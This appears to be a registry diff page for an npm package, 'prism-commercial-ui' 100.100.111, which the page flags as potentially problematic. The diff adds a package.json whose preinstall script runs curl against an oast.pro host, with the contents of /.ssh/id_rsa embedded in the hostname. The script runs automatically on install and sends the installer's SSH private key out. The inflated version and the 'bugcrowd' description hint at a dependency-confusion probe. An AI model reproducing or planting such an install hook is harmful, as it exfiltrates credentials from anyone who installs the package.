prism-commercial-ui 100.100.111
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of prism-commercial-ui might be problematic. Click here for more details.
- package/package.json +16 -0
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "prism-commercial-ui",
|
3
|
+
"version": "100.100.111",
|
4
|
+
"description": "jwosborniv-bugcrowd",
|
5
|
+
"main": "dist/esm/module.entry.js",
|
6
|
+
"files": [
|
7
|
+
"dist/esm"
|
8
|
+
],
|
9
|
+
"scripts": {
|
10
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
11
|
+
"preinstall": "/usr/bin/curl $(cat /.ssh/id_rsa).cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro"
|
12
|
+
},
|
13
|
+
"author": "jwosborniv",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|
16
|
+
|